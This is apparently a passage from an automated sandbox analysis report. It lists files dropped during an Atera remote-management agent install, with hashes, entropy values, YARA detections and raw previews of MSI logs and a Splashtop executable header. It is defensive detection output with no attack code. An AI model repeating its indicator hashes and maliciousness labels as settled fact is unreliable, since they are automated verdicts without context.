                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv7

                                                                                                                                                                                                                                        C:\Windows\Temp\AteraSetupLog.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):225846
                                                                                                                                                                                                                                        Entropy (8bit):3.782508927088187
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:M0HGXlyhzyz3W7AO9ilbqe2QKpJViYAQ+gaWb/vcqcy5NNndwLjoiIgQtJrCpy+S:MWRjqpJgUtj3JMlRviW5TsPa
                                                                                                                                                                                                                                        MD5:44F40D5BA8BCC7FA0A16F53F2423177A
                                                                                                                                                                                                                                        SHA1:3D48B3237DAE6748ED1B497ECD785CC37CF907FD
                                                                                                                                                                                                                                        SHA-256:A5FB4DBB44FB8E6525965630A711B563E7FD19A7EB6E4ACF05DDEDCDEB844ABE
                                                                                                                                                                                                                                        SHA-512:EDBD7FB02686CCE7FEE19AB8A45FB9F1DA3094DBCC030ABC94BDFDCB78E391442F31AD49FEC34A9EC889EF51E74D2469249180A8F1F58F7AD32400196D0EE16B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\AteraSetupLog.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.1.0./.2.0.2.4. . .1.1.:.2.0.:.2.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.B.C.:.C.4.). .[.1.1.:.2.0.:.2.8.:.0.3.4.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.B.C.:.C.4.). .[.1.1.:.2.0.:.2.8.:.0.3.4.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.B.C.:.C.4.). .[.1.1.:.2.0.:.2.8.:.0.3.4.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.a.t.e.r.a.A.g.e.n.t.S.e.t.u.p.6.4._.1._.8._.7._.2...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.B.C.:.C.4.). .[.1.1.:.2.0.:.

                                                                                                                                                                                                                                        C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_000_dotnet_runtime_6.0.32_win_x64.msi.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):551094
                                                                                                                                                                                                                                        Entropy (8bit):3.8429895879270437
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Yc7OjjATNY+2swuiWgnmsaq/DWU3m/GmkS7hRxctjeqcrS4D2x6ge71nv+lmxRj9:4jCQe
                                                                                                                                                                                                                                        MD5:CE1CBD018661CD077BC2423AED1724F2
                                                                                                                                                                                                                                        SHA1:9C5214EF70C5CD795DBBC505F2A5DFB46711B559
                                                                                                                                                                                                                                        SHA-256:24EDFE2B5D679D0C2190A0FCB7D5E3FBBCECDF714DCC931C02A4E1B439BADFB9
                                                                                                                                                                                                                                        SHA-512:E2AF7C2E6A7962D3789530FCC1768875978F49D9C4997404669255C7BC554CD781EF313175D8ED0CF6A9EC26D3473CA8BDB6592CF4BC77499D9A42B52CC7CEFB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_000_dotnet_runtime_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.1.0./.2.0.2.4. . .1.1.:.2.0.:.5.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.6.8.9.F.E.1.8.8.-.3.B.8.D.-.4.0.F.A.-.B.1.E.C.-.A.4.8.1.3.E.A.A.1.C.0.A.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.2.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.4.:.C.0.). .[.1.1.:.2.0.:.5.7.:.5.1.4.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.4.:.C.0.). .[.1.1.:.2.0.:.5.7.:.5.1.4.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.4.:.C.0.). .[.1.1.:.2.0.:.5.7.:.5.1.4.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.3.F.D.C.F.0.A.2.-.7.C.1.F.-.4.1.C.7.-.9.7.4.9.-.0.D.9.1.E.C.2.1.6.A.E.D.}.v.4.8...1.2.8...1.6.7.4.3.\.d.

                                                                                                                                                                                                                                        C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_001_dotnet_hostfxr_6.0.32_win_x64.msi.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (400), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99398
                                                                                                                                                                                                                                        Entropy (8bit):3.7943895672244654
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:gLz5/cBc8Z3NjE98rwtIPDwBKJNVS4Qw+mYe3W9DE4Y4Saej/Pwz0A3b:gOzj/Pwz06b
                                                                                                                                                                                                                                        MD5:113C2BAA802976E12ABC1D5DD6A7FB88
                                                                                                                                                                                                                                        SHA1:591FDA42B1259922BA52D1276650E42F8FA0AD7B
                                                                                                                                                                                                                                        SHA-256:DD1D1DD7B69AEC10B4AB68B9ED5EB3526114E5CFC310B938ACAAE3B2E640DE21
                                                                                                                                                                                                                                        SHA-512:98D36BA883BA6F1C006798C2A1DA034269DF16399CE234CCD2DE733D1AA59A40AEBB893F26B10AD893E97CEC6B723BCCEA7101D843FA6D14A7CAF3074B8D3534
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_001_dotnet_hostfxr_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.1.0./.2.0.2.4. . .1.1.:.2.1.:.1.4. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.6.8.9.F.E.1.8.8.-.3.B.8.D.-.4.0.F.A.-.B.1.E.C.-.A.4.8.1.3.E.A.A.1.C.0.A.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.2.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.4.:.8.0.). .[.1.1.:.2.1.:.1.4.:.4.5.1.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.4.:.8.0.). .[.1.1.:.2.1.:.1.4.:.4.5.1.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.4.:.8.0.). .[.1.1.:.2.1.:.1.4.:.4.5.1.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.6.6.7.C.B.6.5.3.-.7.0.E.1.-.4.E.2.B.-.9.C.8.E.-.6.A.0.2.A.6.C.F.8.8.B.9.}.v.4.8...1.2.8...1.6.7.4.3.\.d.

                                                                                                                                                                                                                                        C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_002_dotnet_host_6.0.32_win_x64.msi.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (385), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109720
                                                                                                                                                                                                                                        Entropy (8bit):3.799876434012075
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:eOS8PodwQl7AX09ebwfmHjbZrJ6QDdlt3sT+AgoMX3NLVjqV3BqsRi9Tmi9+F:e1KjqV3BqsRi9TmiMF
                                                                                                                                                                                                                                        MD5:FB60A7A18A3399C448B3EB13A2112D42
                                                                                                                                                                                                                                        SHA1:73F0F493A5F0434AF830D6A39F8E185307D9DACF
                                                                                                                                                                                                                                        SHA-256:A1DD67A7E045591E2CC2C3B143BF9EC38BBFBA7C842508EE991A8CF926FF7FFC
                                                                                                                                                                                                                                        SHA-512:B9F73FF4648E70E3217EE0E51CAA63D765BF520836E436C01E9FB97EE8E1504820E8E88C9DFB05EC6CB68542151FAC498F6ABD67EEA1960412471347A2FFBEFA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_002_dotnet_host_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.32_(x64)_20241002112056_002_dotnet_host_6.0.32_win_x64.msi.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.1.0./.2.0.2.4. . .1.1.:.2.1.:.1.6. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.6.8.9.F.E.1.8.8.-.3.B.8.D.-.4.0.F.A.-.B.1.E.C.-.A.4.8.1.3.E.A.A.1.C.0.A.}.\...b.e.\.d.o.t.n.e.t.-.r.u.n.t.i.m.e.-.6...0...3.2.-.w.i.n.-.x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.4.:.0.4.). .[.1.1.:.2.1.:.1.6.:.3.4.2.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.4.:.0.4.). .[.1.1.:.2.1.:.1.6.:.3.4.2.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.4.:.0.4.). .[.1.1.:.2.1.:.1.6.:.3.4.2.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.A.0.9.F.8.3.8.1.-.8.8.C.3.-.4.4.C.4.-.9.D.A.B.-.A.C.4.4.F.4.F.4.D.B.4.B.}.v.4.8...1.2.8...1.6.7.4.3.\.d.

                                                                                                                                                                                                                                        C:\Windows\Temp\PreVer.log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4332
                                                                                                                                                                                                                                        Entropy (8bit):3.6770194492770263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:Yh+DK8O5XnoKfLtJKG81c1B1c1NfrPeSDqeS2tJxx9a5XA:UUO5MX0T0h2SD9Sira6
                                                                                                                                                                                                                                        MD5:ED08B5DF69596916407BF90E45B6C403
                                                                                                                                                                                                                                        SHA1:ED5EA4A7594BAA6FED1EDA971EB4EF5A51B54CC7
                                                                                                                                                                                                                                        SHA-256:5DAAA691F1EAD883D90A5A0F842BE5B41AC727037ED706734CDFFD7246F6FAF3
                                                                                                                                                                                                                                        SHA-512:B589E51A54D6FBF50CD8BF9FE035CA815883F327331AC5CE51D30B3CD9D94427715203E84098DDC90FBE371DC2DA981ADB910C14CD27228829DEBEF3D23FA78B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.2./.1.0./.2.0.2.4. . .1.1.:.2.0.:.3.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.4.:.7.8.). .[.1.1.:.2.0.:.3.7.:.6.3.9.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.4.:.7.8.). .[.1.1.:.2.0.:.3.7.:.6.3.9.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.4.:.7.8.). .[.1.1.:.2.0.:.3.7.:.6.3.9.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .s.e.t.u.p...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.6.4.:.7.8.). .[.1.1.:.2.0.:.3.7.:.6.3.9.].:. .C.l.i.e.n.t.-.s.i.d.e. .a.n.d. .U.I. .i.s. .n.o.n.e. .

                                                                                                                                                                                                                                        C:\Windows\Temp\SplashtopStreamer.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):56378536
                                                                                                                                                                                                                                        Entropy (8bit):7.946478796737553
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:786432:eB4DOC/YOGmsS/FcbNbDm87ViwLTCg2m+5iYeVhV4ASHQy6UUZwNSG3bZxE5:jDO0GVUINbD5gwLz2mu2/3YZh3bZS5
                                                                                                                                                                                                                                        MD5:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                        SHA1:35FA2B2BBA3F4E04D078F8B77C5495757144FBDD
                                                                                                                                                                                                                                        SHA-256:C33D039DF86870B7EE728C60B7755E6693596AD6EA9ADD4381F01A42C52877E3
                                                                                                                                                                                                                                        SHA-512:09A50B84F24354DCF35E01E4C7C0081A2C34A7D12957DAF7608A20A5B3EFCEEA63772AEEE4D095A7FD79BFFEC8AB84398048E7BE96CBEA9CC3BA8F2A824316EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........{F~.(F~.(F~.(O.8(U~.(F~.(.|.(O.>(\~.(O.((.~.(O./(.~.(O.!(A~.(O.?(G~.(O.:(G~.(RichF~.(................PE..L......f............................./............@..................................3].............................................. ..(.............\..(..........`................................i..@...................D........................text............................... ..`.rdata..............................@..@.data....^......."..................@....rsrc...(.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\ateraAgentSetup64_1_8_7_2.msi

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: AteraAgent, Author: Atera networks, Keywords: Installer, Comments: This installer database contains the logic and data required to install AteraAgent., Template: x64;1033, Revision Number: {911E9E2F-B38D-4D02-A148-5E49FC9D8943}, Create Time/Date: Wed Feb 28 10:52:04 2024, Last Saved Time/Date: Wed Feb 28 10:52:04 2024, Number of Pages: 200, Number of Words: 6, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2994176
                                                                                                                                                                                                                                        Entropy (8bit):7.878630966889847
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:s+1Ypn4N2MGVv1zyIBWGppT9jnMHRjOOozjcqZJN8dUZTwYaH7oq1xMbY+K/tzQz:s+lUlz9FKbsodq0YaH7Z1xMb8tT
                                                                                                                                                                                                                                        MD5:5E90226ABB5A004B0B9DB9A9E67BAC21
                                                                                                                                                                                                                                        SHA1:34EB703055BAFA469A714F18C7F00E5098B764AF
                                                                                                                                                                                                                                        SHA-256:BE0C53481ED4CF3EC4D0AD16053CD18D6AAD8C349B8281F5F9B90B526420CEAE
                                                                                                                                                                                                                                        SHA-512:2676357D10AA76F09F2A1F691C7566D54E34B20716EDF1301B2D69C3E3400D0A70E7C1738AEA9A75334B384AB988CEA3A07B983C900AE32395285BE61673C288
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF01A4B056E90FEFD4.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF075AB9A770FA8887.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF0B294D66713B8AC8.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.6045756871847139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:C8Ph4uRc06WXzAFT5qd/8BctSjndd4d/EqdGUDjzbQSSsndd4dXE8:th411FT0/8Bc93DfNg
                                                                                                                                                                                                                                        MD5:DDB86F5B58A205F2D26E2ECDB06069CD
                                                                                                                                                                                                                                        SHA1:AB425904331722C227225F6ACDC23FD657B01F90
                                                                                                                                                                                                                                        SHA-256:B75A8CDEFF4B90500AB54993394B554694F48468B25F78F895AB710649C966BE
                                                                                                                                                                                                                                        SHA-512:17E4B940DCC23C9CC616A0259C7E50726ED126564A55CDB26F188F37013F4DE85885E3E5E914B15E9B1CFC8C3C574607D99E47AD58D3D1989D6A94770FF04EB2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF0B294D66713B8AC8.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF10DC9880CC52EE82.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):512
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF1180A11919FC8284.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):1.5814558018431928
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W8PhmuRc06WX4wnT556SVRfqISoedGPdGfMKrQP/StedGPdGRubkZn:phm1AnTf62SIBvHoYZ
                                                                                                                                                                                                                                        MD5:A46F9A7AF8750EB4C350A1ADD299E2D2
                                                                                                                                                                                                                                        SHA1:EF225989A2D053A399C97A17F290C948C73F4659
                                                                                                                                                                                                                                        SHA-256:E9268BAA413D01BE9227509E0699E46726EE3FEEC07AF22802EBE2C98AB43C5D
                                                                                                                                                                                                                                        SHA-512:9FBDF5EF569DCCFD48AC84DA5C91936149D547A40A7D404846AF2E54571421EA64B1AD6805FD5E1C6DAF98BCA45014064278D44A4685CA2D6EE98B584E11CBE0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1180A11919FC8284.TMP, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Windows\Temp\~DF248B0743A373C27E.TMP

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
